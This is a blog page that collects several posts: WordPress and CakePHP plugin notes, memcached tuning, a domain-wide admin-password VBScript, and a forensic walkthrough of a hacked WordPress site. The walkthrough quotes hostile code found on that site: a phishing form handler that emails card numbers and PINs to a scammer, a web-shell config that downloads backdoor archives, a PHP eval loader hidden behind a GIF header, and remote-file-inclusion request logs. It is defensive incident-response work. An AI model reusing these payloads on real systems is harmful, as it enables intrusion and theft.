If you’ve used Cart66 before then I’m sure you realize it’s pretty lacking in features.  In fact to really get a store going you have to do a lot of manual intervention and hacking.  It just doesn’t seem very clean.  The idea that you have to make a post or page your self for every product seems very kludge and has been a bit cumbersome for most users.  That is why I wrote this plugin cart66_migrate to Migrate Cart66 to WP-e-Commerce.

The plugin utilizes the ecommerce_feeder plugin to import the items to your WP-e-Commerce store.

Prerequisites

In order to use this plugin you will need to already have the Ecommerce Feeder plugin installed and activated.    As well as WP-e-Commerce

Share on Facebook

Life is great, you have your very own WordPress site.  Your own soapbox to stand on and rant to the world!  Then one day your hosting provider gives you a tragic new, ‘Your site has been hacked!’   Your whole world is crushed, your privacy on your public facing blog is gone! So your WordPress site got hacked, now what?

First things first, be calm don’t make any harsh decisions.  Seriously, your first instinct will be to delete the site right away.  Don’t do that, you have a great advantage right now.  The hacker probably doesn’t know that you know yet.  This is your perfect opportunity to start gathering as much information as you can.

So first step, copy your website and access_log & error_log off your webserver to another computer to start looking them over.  If you can export a copy of your database also then do that as well.  Next lets make a record of who is connected right now,  do a netstat -an and redirect the output to a text file for later viewing.

Now we still don’t want to remove any files, but we do want to make sure that our site isn’t being used for malicious purposes.  So we will limit access to the site to ourselves for a while.  Go to the root of your website and create a .htaccess file with the following in it

order deny,allow
deny from all
allow from 192.168.1.5 #this should be whatever your current IP is

Now it’s time to get to the sleuthing part to discover what happened.  The first thing we should look for is new files – suspicious files.  To do this we have a few options, one is to use the built in find command in Linux.

find . -ctime -7 > list

This command says: show me all the files changed in the last seven days. You may need to go further back then seven days, but one week is a good place to start.  Start going through this list and look for files that don’t look like normal blog files.  Basically, you’re looking for anything that is some sort of script (*.php, *.js, *.pl, *.cgi), if your using IIS look for new asp files also.  Any new scripts that have appeared on your server should be very suspicious!

In one example I discovered the following files recently had their status changed.

wordpress/mod_status.php
wordpress/wp-content/themes/identification.007.php
wordpress/wp-content/themes/identification.php
wordpress/wp-content/themes/mambo.php
wordpress/wp-content/themes/dt-chocolate/cache/ffe37f6533095659017bd96829adf796.php
wordpress/wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php
wordpress/wp-content/themes/dt-chocolate/cache/69fe6694b6c6f71234f258694f02434c.php
wordpress/wp-content/themes/dt-chocolate/cache/6de6dbf331c00df4d652ae9eb9a90bcc.php
wordpress/wp-content/themes/dt-chocolate/cache/939eb3a34a3d191de76a00351712a316.php
wordpress/wp-content/themes/dt-chocolate/cache/header.php
wordpress/wp-content/themes/dt-chocolate/cache/renm.php

Let’s take a look at the files one by one and see what they are and what they do.

First file mod_status.php this file when we look at it sends up flags right away that it’s going to be suspicious.  Right away we see in this script that it is making some sort of connection off to other servers and the files were generated with Microsoft frontpage.  This tells us that these are your normal wordpress files.  I also  see in this file that it has instructions to go and download other files.  So why not go download these files to your backup directory? We should also investigate further what the goal was.

Another thing I noticed was this line

"$newuser = '@echo off;net user Admin /add /expires:never
/passwordreq:no;net localgroup "Administrators"
/add Admin;net localgroup "Users" /del Admin';"

This was a really interesting attempt.  They were trying to see if they could add their own user to you Windows domain.  What this basically means is that if you were running this in IIS it would have tried to use the computers domain account to create a new admin user for true remote access.  Since this was a Linux computer and not part of a domain, we ignore it and move on.

The next file we look at is identification.007.php  after seeing this file, I know exactly what their goal was in this attack.  They wanted to use this site in a phishing attack.  This means they host a fake site on our server to try to gather information about other people.  Perhaps they are trying to gather bank account or credit card numbers by spamming users and having them come to your site and type in their sensitive information.  That way when it finally gets tracked down, you are to blame while each result was being emailed to them all along.

Remember how we said it was important that you don’t delete any files?  Well, this is why.  We now have proof that we weren’t the ones trying to steal people’s private information.  We also have records to show people where the information was sent to.  Lets keep going now.

identification.php this is the script that takes all the results from the phishing form and emails it off to the scammer christinewebb@gala.net We may want to have fun with this later

$to = "christinewebb@gala.net";
//-----------------------------------
$accountNumber = $_POST['accountNumber'];
$cardNumber = $_POST['cardNumber'];
$dod = $_POST['dod'];
$dom = $_POST['dom'];
$doy = $_POST['doy'];
$uwpin = $_POST['uwpin'];
$naam = $_POST['naam'];
$adres = $_POST['adres'];
$postcode = $_POST['postcode'];
$Toegangscode1 = $_POST['Toegangscode1'];
$ip = $_SERVER['REMOTE_ADDR'];
$subj = "ABN ";
$msg = "Rekeningnummer : $accountNumber\nPasnummer : $cardNumber\nUw PIN: $uwpin\nGeboortedatum: $dod-$dom-$doy\nNaam: $naam\nAdres: $adres\nPostcode: $postcode\nMobiel Telefoonnummer: $Toegangscode1\nIp : $ip";
$from = "FROM: ABN";

                        {

                mail($to,$subj,$msg,$from);

                                }

                    header("location: http://www.abnamro.nl");

Moving on, mambo.php when looking at this file we see just a bunch of garbage.

eval(gzinflate(base64_decode('
7f15f+K4sjgO/38/n/se......

This is highly suspect, this right away tells us that someone is trying to hide something. What you see in the beginning says the following code is bas64 encoded (MIME encoded) and gzip. You only see this in one of two situations: One is in commercial software when they are trying to hide/obfuscate the source code, the other is when an attacker is trying to hide a malicious script from forensic tools like malware/virus scanners. The good thing is that this is a really week method to hide the code. Go to http://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php and pass it the code here is what our decrypted version would look like

Looking at the decrypted version tells me something very important. First, the attacker used a pre-made tool and secondly they wanted more than just to run a phishing site; they were trying to trojan this computer to keep using it.

#######################################
## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08   ##
define('sh_ver',"2.0.09.08");        ##
## By FaTaLisTiCz_Fx                 ##
## ? 03-09 2008 FeeLCoMz Community   ##
## Written under PHP 5.2.5           ##
#######################################
$sh_name = sh_name();                ##
#######################################
#$sh_mainurl        = "http://localhost/FX29SH/";
$sh_mainurl        = "http://uaedesign.com/xml/";
$fx29sh_updateurl  = $sh_mainurl."fx29sh_update.php";
$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
$sh_sourcez = array(
  "Fx29Sh"   => array($sh_mainurl."cyberz.txt","fx29sh.php"),
  "psyBNC"   => array($sh_mainurl."fx.tgz","fx.tgz"),
  "Eggdrop"  => array($sh_mainurl."fxb.tgz","fxb.tgz"),
  "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
);
##[ AUTHENTICATION ]##
$auth = array(
  "login"     => "",
  "pass"      => "",
  "md5pass"   => "",
  "hostallow" => array("*"),
  "denied"    => "".$sh_name.": access denied!",
);
##[ END AUTHENTICATION ]##
$curdir = "./";
$tmpdir = "";
$tmpdir_logs = "./";
$log_email = "shell.shell99@yahoo.com";
$sess_cookie = "fx29shcook";
$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.
$usefsbuff = TRUE;
$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste
$surl_autofill_include = TRUE;
$updatenow   = FALSE;
$gzipencode  = TRUE;
$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
$hexdump_lines = 8;
$hexdump_rows = 24;
$millink = milw0rm();
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = getdisfunc();
##[ END OF CONFIGS ]##

So the fact that the attacker used a pre-made tool tells us they were not experienced enough to do it on their own, and/or they used an automated scanning tool to find their vulnerable file and compromise the machine. The fact that the version of FaTaLisTiCz_Fx Fx29Sh is older (from 2008) and that a quick google search finds a much newer version confirms that they didn’t have the skill to do it on their own and they didn’t write this script. It also tells us that they probably have been using this script for a few years…at least.

Now that I know they tried to install much more malicious code, I want to stop right now and run some basic scans for trojans, viruses and rootkits on this server. Because the files they listed their (Eggdrop, Binddoor, Fx29sh & psyBNC) are known rootkits. Go to www.chkrootkit.org/ download the chkrootkit and run it right away; it knows how to detect almost all of these root kits. Also right now start looking at your access_log to see if they actually ran this script and what they were able to do with it.

When I checked this system, it looked like they were not able to do much of anything. The sysadmin had taken some proper precautions and installed SuPHP. This limits the web server to run only as the php user who owns the files, it also prevents php from leaving the document root, kind of like a chroot. An analysis of the chkroot says no root kits where found. A deeper scan of the system says no backdoors were installed. This is very lucky. If a backdoor had been found, then their is no telling how far the attack had gone and your best course of action would have been to backup the system and start a rebuild. Once an attacker has elevated their privileges your system security is done.

Also, looking through the access log shows that this script was never accessed and greping through the webtree shows it wasn’t included in any other script (“Assuming the other scripts we haven’t explored yet aren’t also encoded like mambo”)

Next file ffe37f6533095659017bd96829adf796.php right away we see some shenanigans again

GIF89a?????ˇˇˇ!˘????,???? ? ?? ?;? ?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIbvB/...

This time, what we see is that they tried to make this file look like some sort of gif to trick a sanity check into believing that it is a gif and not a malicious code. Using our decode method discussed earlier, the scripts that are embeded are as follows.

ffe37f6533095659017bd96829adf796.decoded.part1
ffe37f6533095659017bd96829adf796.decoded.part2
ffe37f6533095659017bd96829adf796.decoded.part3

 
After looking at these scripts I can tell that the first two are just to do enumeration. That means they are trying to see what commands your PHP supports as well as what version of php you are using. The third script however, is trying to upload any file it wants to, to your web path. We can deduce that this may have been how they got into the system.
So I’m going to grep through the access log and see if I’m right.

 116.197.2.185 - - [21/Jan/2012:08:01:22 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/ffe37f6533095659017bd96829adf796.php HTTP/1.1" 200 354 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)" 116.197.4.30 - - [22/Jan/2012:21:28:21 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/ffe37f6533095659017bd96829adf796.php HTTP/1.1" 200 354 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)" 

Sure enough it looks like this script was indeed called, but how did this script get there? Based off of the logs, we now have a time frame and user agent to start looking through our logs. Right away I start noticing the other files I discovered that they uploaded such as:

116.197.4.30 - - [22/Jan/2012:20:02:48 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/69fe6694b6c6f71234f258694f02434c.php HTTP/1.1" 200 8862 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:20:02:50 -1000] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:27:48 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/69fe6694b6c6f71234f258694f02434c.php HTTP/1.1" 200 8864 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/69fe6694b6c6f71234f258694f02434c.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:27:52 -1000] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:28:21 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/ffe37f6533095659017bd96829adf796.php HTTP/1.1" 200 354 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:28:34 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php HTTP/1.1" 200 6275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:28:45 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php?http://virtual.uarg.unpa.edu.ar/myftp/list.txt?&action=upload&chdir=/home/asynonymous/rdecojewelry.com/htdocs/cms/wp-content/themes/dt-chocolate/cache/ HTTP/1.1" 200 6374 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:29:09 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/header.php HTTP/1.1" 200 1252 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:29:22 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/header.php HTTP/1.1" 200 1379 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/header.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:30:02 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php?http://virtual.uarg.unpa.edu.ar/myftp/list.txt?&action=upload&chdir=/home/asynonymous/rdecojewelry.com/htdocs/cms/wp-content/themes/dt-chocolate/cache/ HTTP/1.1" 200 6421 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php?http://virtual.uarg.unpa.edu.ar/myftp/list.txt?&action=upload&chdir=/home/asynonymous/rdecojewelry.com/htdocs/cms/wp-content/themes/dt-chocolate/cache/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:37:10 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/renm.php HTTP/1.1" 200 7514 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:37:45 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/renm.php HTTP/1.1" 200 2540 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/renm.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:37:57 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/renm.php HTTP/1.1" 200 7144 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

Bam, their we go, we now see exactly what they were doing. They were using those scripts in the cache directory to download other files to the system and get them in place to run their scam. They are also using their new files to move other files all over the system.

But how did the original php scripts get into the cache directory, and what is with that odd filename? Looking though the access log further, I see several really odd requests.

213.198.35.81 - - [22/Jan/2012:13:32:38 -1000] "GET /cms/who-is-r-deco-jewelry//wp-content
/themes/dt-chocolate/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 301
- "-" "Mozilla/5.0   (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"

213.198.35.81 - - [22/Jan/2012:13:34:57 -1000] "GET /cms/blog//wp-content/themes/dt-chocolate
/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 301 - "-" "Mozilla/5.0
(Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"

213.198.35.81 - - [22/Jan/2012:13:35:02 -1000] "GET /cms//wp-content/themes/dt-chocolate
/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 400 184 "-"
"Mozilla/5.0   (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"

213.198.35.81 - - [22/Jan/2012:13:35:16 -1000] "GET /cms//wp-content/uploads/thumb-
temp/69fe6694b6c6f71234f258694f02434c.php HTTP/1.1" 301 - "-" "Mozilla/5.0   (Windows; U;
Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"

86.148.157.95 - - [22/Jan/2012:14:55:35 -1000] "GET /cms/return-policies//wp-content/themes
/dt-chocolate/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 301 - "-"
"Mozilla/5.0 (Windows; U; Windows NT   5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"

86.148.157.95 - - [22/Jan/2012:15:00:56 -1000] "GET /cms/return-policies//wp-content/themes
/dt-chocolate/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 301 - "-"
"Mozilla/5.0 (Windows; U; Windows NT   5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"

86.148.157.95 - - [22/Jan/2012:15:01:01 -1000] "GET /cms//wp-content/themes/dt-chocolate
/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 400 184 "-" "Mozilla/5.0
(Windows; U; Windows NT   5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"

What is that? It seems they are calling the thumb.php script and passing it as a URL. If we go download that file at http://blogger.com.nilgirisrealty.com/cok.php we see that same exact gif exploit in the header of the script. This makes sense now. They were using the thump.php script (which is used to dynamically make thumbnails and cache them in the cache directory) to upload their malicious scripts and then called them based off of a dynamically assigned name they were given.

Going through the reset of the files in the cache directory, I see they have embedded Trojan horse script to try to bind backdoor install. Once again due to the webserver configuration this was not possible to run.

To insure they didn’t get their backdoor on this computer, I used lsof to check for open ports and running processes on my machine. Thanks to Dre @ http://www.securityaegis.com/ for pointing our that you should also use lsof +L1 to detect any running processes that have had their files deleted after starting. This is a great way to hide your backdoor. Start your program, once it’s running remove the executable. Then a scanner can’t see it. You’re program would only be running in memory then. Also since I ran chkroot and a virus scan and both of those turned up clean as well as the fact that I didn’t discover any other new files, I now know the full extent of the attack.

I’ve gone through and decoded each of the files they uploaded into the cache directory as well as other parts of the system and used the access_log to discover all the files they uploaded. Now that I know the full extent of the attack I can start to clean up the system.

Clean up Time

Remove malicious files

Now that we know all the files that were uploaded we are going to start repairing the system. I’m going to remove all the newly created files as well as the thumb.php script that was used for the initial attack. I actually discovered after a little bit of research that the thumb.php file was actually the well known timthumb script. The theme developer had just stripped out the header originally and that is why it wasn’t recognized earlier. Let this be a lesson to all programmers: If you use someone else’s code, you better damn well give them credit! Especially if it has known vulnerabilities, this way vulnerability scanners can detect it easier. So I downloaded the most recent version (as of this writing 2.8.5) which has this vulnerability patched and replaced the file.

Restore original vendor files.

Replace all plugins and core WordPress files with the originals just in case a core file was modified and you didn’t detect it. You may even want to check if there is a new version of your theme available for update. Be sure that if you do update your theme that it doesn’t contain the same vulnerability.

Security Salt & Nounces

One of the first things you need to do before you turn your site back on is update your security strings inside wordpress/wp-config.php see https://api.wordpress.org/secret-key/1.1/salt/ That URL will generate you new salt’s and nounces.

MySQL Security

Also, since they got access to your wordpress site, you should change the password for your wordpress db user and go through your database and make sure no malicious scripts where injected into your post. How to do that is outside the scope of this article, but if you need a consultant I’m happy to help.

Conclusion

It sucks getting hacked, and if you use your site to do business it can be very expensive getting compromised. If you feel like you need professional help cleaning up a site, we can help. Use the About section above to get in touch with us.

Also, see our article on how to secure your site before it gets hacked.

Share on Facebook

With CakePHP 2.0 the authentication system has been completely redesigned to allow for extending the Auth component to allow other methods of authentication and authorization.  I finally sat down last weekend and updated my LDAPAuth component to work with the new version.  While I was doing it I added a few new features that people had been asking for. Also by updating this component I ended up also updating the Ldap Datasource. This included a lot of code cleanup as well.

You can get the new code at https://github.com/analogrithems/idbroker/tree/dev_cake2.0

To get things going download the idbroker code from github and place it in your  plugin folder App/Plugin/Idbroker pay attention to the new capital first letter.  This is a new convention for the CakePHP 2.0 to help in automatic class loading.

Now in your App/Controller/AppController.php you need a minimal of the following

<?php
class AppController extends Controller {
        var $components = array('Auth', 'Session', 'RequestHandler');

        var $user;

        function beforeFilter(){
                global $menus;
                $this->Auth->authenticate = array('Idbroker.Ldap'=>array('userModel'=>'Idbroker.LdapAuth'));
                //If you want to do your authorization from the isAuthorized Controller use the following
                $this->Auth->authorize = array('Controller');
        }

        /*
        * This just says aslong as this is a valid user let them in, you can also modify this to restrict to a group
        */
        public function isAuthorized(){
                $user = $this->Auth->user();
                if($user) return true;
                return false;
        }
}

Notice:That in the components you define the Auth component. This is making all your controllers register the authentication component. In the beforeFilter you are specifically stating you want to use the Idbroker’s Ldap Auth. Then you’re also telling your app to use the prepackaged model for the LDAP component.

The next step is to configure your Users controller and your views.

In your /App/Controller/UsersController.php

<?php
class UsersController extends AppController {
        var $name = 'Users';

        /*
        * Make sure to define which functions don't require auth to be accessed
        */
        function beforeFilter(){
                $this->Auth->allow('usernameExists', 'forgotPassword', 'signup','login','logout');
                parent::beforeFilter();
        }

        function login(){
                if ($this->request->is('post')) {
                        if ($this->Auth->login()) {
                                return $this->redirect($this->Auth->redirect());
                        } else {
                                $this->Session->setFlash(__('Username or password is incorrect'), 'default', array('class'=>'error-message'), 'auth');
                        }
                }
        }

        function logout(){
                $this->log("Destroying session",'debug');
                $this->Session->destroy();
                $this->redirect($this->Auth->logout());
        }
}

You’ll notice compared to previous version of the authcomponent you used to just have the Auth component automatically do the auth, now you actually call $this->Auth->login() to get it to actually check the username and password and run the login logic.

We’re not done yet, we also need to create our view /App/View/Users/login.ctp

<div id='loginForm'>
<?php
        echo $this->Session->flash('auth');
        echo $this->Form->create('Users', array('action' => 'login'));
        echo $this->Form->input('username');
        echo $this->Form->input('password',array('value'=>''));
        echo $this->Form->input('remember',array('type' => 'checkbox', 'label' => 'Remember me'));
        echo $this->Form->submit('Login');
?>
</div>

Last piece to tie this all together is telling your application how to access your LDAP server. Add something like this to youyr /App/Config/database.php

<?php
class DATABASE_CONFIG {
        public $ldap = array (
                        'datasource' => 'Idbroker.LdapSource',
                        'host' => 'localhost',
                        'port' => 389,
                        'basedn' => 'DC=example,DC=com',
                        'login' => 'CN=Manager,DC=example,DC=com',     //For Proxy Userdn
                        'password' => 'LdapPassword',  //For Proxy UserDN password
                        'database' => '',
                        'tls'         => false,
                        'type' => 'OpenLDAP', //Available types are 'OpenLDAP', 'ActiveDirectory', 'Netscape'
                        'version' => 3
        );
}

And in your /App/Config/bootstrap.php add the following to the very bottom

CakePlugin::load('Idbroker');
Configure::load('ldap');

These two lines tell your app to first load the Idbroker plugin and then load the ldap config file which you will create next.

Then create an ldap config file /App/Config/ldap.php with the following. This config file will configure how Ldap is used through out your app.

/**
 * LDAP Settings
 *
 */
        $config['LDAP']['Db']['Config'] = 'ldap'; //What is the name of the db config that has the LDAP credentials
        $config['LDAP']['User']['Identifier'] = 'uid'; //What is the LDAP attribute that identifies the username attribute,
                                                       // openldap, iplant, netscapr use uid, AD uses samaccountname
        $config['LDAP']['Group']['Identifier'] = 'cn'; //What is the LDAP attribute that identifies the group name, usually cn
        $config['LDAP']['Model'] = 'Idbroker.LdapAuth'; //Default model to use for LDAP components
        $config['LDAP']['LdapAuth']['Model'] = 'Idbroker.LdapAuth';
        $config['LDAP']['LdapAuth']['MirrorSQL']['Users'] = 'User'; //A SQL table to duplicate ldap records in for user
        $config['LDAP']['LdapAuth']['MirrorSQL']['Groups'] = 'Group'; //A SQL table to duplicate LDAP records in for groups
        $config['LDAP']['LdapACL']['Model'] = 'Idbroker.LdapAcl';
        $config['LDAP']['LdapACL']['groupType'] = 'group';
        $config['LDAP']['groupType'] = 'groupofuniquenames'; //What object class do you use for your groups?
        $config['LDAP']['Group']['behavior']['tree']['parent_id'] = '49db8df1-5e74-4e91-b15f-4d33e927f14e'; //Are you using a tree behavior?  Need to set the default parent_id?

That last part was a lot, not all of that is needed. Really just the first line is $config['LDAP']['Db']['Config'] = ‘ldap’; – this part tells your application which database config to use for LDAP. The other config options are for new extended features that I will explain below.

When creating this plugin I made use of the new extended features to allow you to use the HTTP basic authentication. In this method you can actually pass your username and password credentials in the http request header. This is useful for allowing command line tools like wget & curl to access authorized parts of your application. It is also used for rest applications.

Another new features that has been added to this Auth Component is the ability to have Ldap Auth mirror a SQL table. What this means is that if you really want to have your user information in SQL but just have authentication come from Ldap you can do that. You need to add the following configuration options to the bootstrap.php These tell it which Models to use to mirror the data to and what the LDAP identifiers are for the data.

        $config['LDAP']['LdapAuth']['MirrorSQL']['Users'] = 'User'; //A SQL table to duplicate ldap records in for user
        $config['LDAP']['LdapAuth']['MirrorSQL']['Groups'] = 'Group'; //A SQL table to duplicate LDAP records in for groups
        $config['LDAP']['User']['Identifier'] = 'uid'; //What is the LDAP attribute that identifies the username attribute,
                                                       // openldap, iplant, netscapr use uid, AD uses samaccountname
        $config['LDAP']['Group']['Identifier'] = 'cn'; //What is the LDAP attribute that identifies the group name, usually cn

Have a question?

Discuss it in the CakePHP 2.0 Ldap Plugin Forum

Share on Facebook

There have been many times where I need to have some sort of revision ability in my cake apps.  I’ve looked through the bakery and never found a very good clean solution.  I thought about it for a bit and it seems like a pretty simple thing to do, so I made a light weight simple behavior that provides this

The behavior is built into a plugin because it also has an simple model(table) that it uses to store revisions for all the other tables.  The idea is that when ever you update your table this behavior will jump in, grab the current copy of the data and save it to the revisions table with the current timestamp.  It then adds a few functions to your model you’ve added the behavior on to make sure it can see the previous behaviors.

One of the best features of this plugin is that it will store multiple models revisions all in the same table.

I’ve written this for CakePHP 1.3.x so it make not work with older or newer versions. Let me know if you have any questions or feedback

You may now be asking your self, where can one find such a fine piece of code?  As with most of my code it resides on github  https://github.com/analogrithems/revisionable

So far it is very simple, all you have to do add re-visioning to your models is add the revisionable behavior to your plugin.

Setup

1) First you need to add the table to your project use the following to generate that
cake schema create Revisionable.revision

2) add the behavior to your model like so

	var $actAs = array('Revisionable.Revisionable');

Some Configure options

If you already have a table named revisions in your project and need to call the it something else then
make a new table/model in your project that has the same schema as this plugin and pass that model name
to the actAs setup like so

	var $actAs('Revisionable.Revisionable'=>array('revisionableModel'=>$newModelName));

To Do

So far aside from creating a revision everytime the data changes the only other feature of this plugin
is the listRevisions function. It works like this

	$revisions = $this->Model->listRevisions($this->Model->id);

	print_r($revisions);
	array(
		'2011-12-05 01:01:01'=> array(
			'Pages' => array(
				'id'=> '4edd8cc3-a628-490b-8cbf-6435ac1005e9',
				'name'=> 'foobar',
				'body'=> '....'
			)
		)
	);

Need to create some more functions that add to this, like a a restore where you pass the id & date and
it will do a restore and perhaps a diff viewer. Patches are warmly welcome.

 
Also I use uuid as my primaryKeys I will try to find some time to ad a configuration option that will allow for int as the primaryKey. In all reality, nothing really prevents this from working with int except for the table schema, so if you just change the table schema to use int then the rest of the plugin will follow.

Share on Facebook

Here is an awesome script I found to change the admin password on all the computers in your domain.  It uses a simple visual basic object to search for all the computers in your domain’s Active Directory then loops through each computer and sets a new password for the Administrator account.

On Error Resume Next
rem http://blogs.technet.com/b/heyscriptingguy/archive/2007/07/03/how-can-i-change-the-local-administrator-password-on-all-my-computers.aspx
Const ADS_SCOPE_SUBTREE = 2

Set objConnection = CreateObject("ADODB.Connection")
Set objCommand =   CreateObject("ADODB.Command")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"

Set objCommand.ActiveConnection = objConnection
objCommand.CommandText = _
    "Select Name From 'LDAP://DC=hilohattie,DC=com' Where objectClass='computer'"
objCommand.Properties("Page Size") = 1000
objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE
Set objRecordSet = objCommand.Execute
objRecordSet.MoveFirst

Do Until objRecordSet.EOF
    strComputer = objRecordSet.Fields("Name").Value

    Set objUser = GetObject("WinNT://" & strComputer & "/Administrator")
    objUser.SetPassword "P0dvd1h@te"

    objRecordSet.MoveNext
Loop

Share on Facebook

I had a few people ask me how to really get the most out of their WP eCommerce site.  On its own WordPress is actually a really fast efficient program.  It’s not until we start adding on our fancy themes and useful plugins that it starts to bog down.  Mix this with lots of traffic and you have a 500lb gorilla problem.  It’s ok though because some amazing tools have been written to fix this.  This post will show you how to optimize your WP eCommerce Site to get the most out of it.  This method assumes you aren’t on a shared host or at least have the ability to install extra software and run additional services on your server.

Step 1

The first thing you need to do is download and install Memcache.  Luckily in most distros their is a package for this.  In Centos,Redhat and fedora you can install by simply doing the following.

yum -y install memcached libmemcached php-pecl-memcache

So a few things to note, one is we actually install multiple packages.  The first one is the memcached server, the second one is a set of common client libraries and the last is the php library.  You may at this point be wondering what is Memcache, great question.  Memcache is a simple server that you run to cache data for you.  It cuts down on the amount of SQL queries you do by caching them.  It was originally created by some smart folks at Live Journal to try to ease up on the extreme load they were putting on their databases.   They claimed memcache caused an 80% improvement in performance.

How does it work?

Basically when you need to get some data from your database you check if memcache has that data first, if it does you take that and don’t bother with the expensive db query.  If it doesn’t you query the db and then tell memcache the result.  That way next time you go to get that data you can get it from memcache which will be much faster than your database.  This is important in ecommerce because on a single page load you can make over 700 sql queries.

So once you have memcache installed,  you need to configure it.  I set my cache size to 1024.  This makes is probably overkill for a single ecommerce site, but my server has plenty of memory and I feel it’s work it.  If you installed via an rpm you’ll probably have a config file under /etc/ for Centos/Redhat it will be /etc/sysconfig/memcached  See this page for more documentation on memcached.  Once you have it configured start the memcached service.

chkconfig memcached on
/etc/init.d/memcached start

Step 2

With memcached up and running it’s time to get the wordpress side configured to take advantage of this.  Login to your dashboard as admin and go to the plugins section.  Install the W3 Tototal Cache Plugin and activate it.  The click on the Performance tab of the left column.

Enable the following and set the method to memcached

• Page Cache
• Database Cache
• Object Cache

Click on the Page Cache link on the left and make sure that the memcache server configuration is correctly set.  Do this again for Database Cache & Object Cache.  Once you are done visit a few of your public facing pages.  At first you probably wont notice a performance increase until you or anyone clicks on those pages again.  The next time the page loads it will have a lot of the information now stored in memcache and wont need to fetch nearly as much from the DB.  If after a few minutes you do get a noticeable page boost check the Trouble shooting section below

Summary

